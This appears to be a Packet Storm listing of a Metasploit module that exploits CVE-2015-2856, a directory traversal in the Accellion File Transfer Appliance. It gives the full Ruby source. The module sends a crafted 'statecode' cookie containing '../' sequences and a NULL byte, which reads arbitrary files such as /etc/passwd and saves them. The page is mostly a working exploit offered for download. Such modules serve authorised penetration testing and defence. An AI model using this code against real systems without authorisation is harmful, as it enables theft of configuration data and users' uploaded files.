what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Accellion FTA Statecode Cookie Arbitrary File Read

Accellion FTA Statecode Cookie Arbitrary File Read
Posted Sep 1, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module exploits a file disclosure vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided statecode cookie parameter is appended to a file path that is processed as a HTML template. By prepending this cookie with directory traversal sequence and appending a NULL byte, any file readable by the web user can be exposed. The web user has read access to a number of sensitive files, including the system configuration and files uploaded to the appliance by users. This issue was confirmed on version FTA_9_11_200, but may apply to previous versions as well. This issue was fixed in software update FTA_9_11_210.

tags | exploit, web
advisories | CVE-2015-2856
SHA-256 | 54b5d23c43a234a88b3e5e9d8345ae34b6dec9bf36741d5a1bc88d1cdf6813e5

Accellion FTA Statecode Cookie Arbitrary File Read

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(update_info(info,
'Name' => "Accellion FTA 'statecode' Cookie Arbitrary File Read",
'Description' => %q{
This module exploits a file disclosure vulnerability in the Accellion
File Transfer appliance. This vulnerability is triggered when a user-provided
'statecode' cookie parameter is appended to a file path that is processed as
a HTML template. By prepending this cookie with directory traversal sequence
and appending a NULL byte, any file readable by the web user can be exposed.
The web user has read access to a number of sensitive files, including the
system configuration and files uploaded to the appliance by users.
This issue was confirmed on version FTA_9_11_200, but may apply to previous
versions as well. This issue was fixed in software update FTA_9_11_210.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://www.rapid7.com/blog/post/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857/'],
['CVE', '2015-2856']
],
'DisclosureDate' => '2015-07-10'
))

register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The URI to request that triggers a call to template()', '/courier/intermediate_login.html']),
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
])
end

def run_host(ip)
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['TARGETURI'],
'cookie' => 'statecode=../../../../..' + datastore['FILEPATH'] + '%00',
})

return if not res

if res.code != 200
vprint_status("#{peer} Unexpected response code: #{res.code} #{res.message}")
return
end

contents = res.body.to_s

# Check for patched versions of the FTA
if contents =~ / Missing session ID.*Accellion, Inc/m
print_error("#{peer} Appears to be a patched Accellion FTA")
return
end

fname = ::File.basename(datastore['FILEPATH'])

expected_server = "Apache"
expected_expires = 'Mon, 26 Jul 1997 05:00:00 GMT'

# Use hints from the server headers to indicate whether we think this was a valid response
if res.headers['Server'].to_s == expected_server && res.headers['Expires'].to_s == expected_expires
path = store_loot(
'accellion.fta.file',
'application/octet-stream',
rhost,
res.body,
fname
)
print_good("#{peer} Successfully downloaded #{datastore['FILEPATH']} as #{path}")
else
vprint_status(
"#{peer} Unexpected response headers: (Server=#{res.headers['Server'].inspect} Expected=#{expected_server.inspect}) " +
"(Expires=#{res.headers['Expires'].inspect} Expected=#{expected_expires.inspect})"
)
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close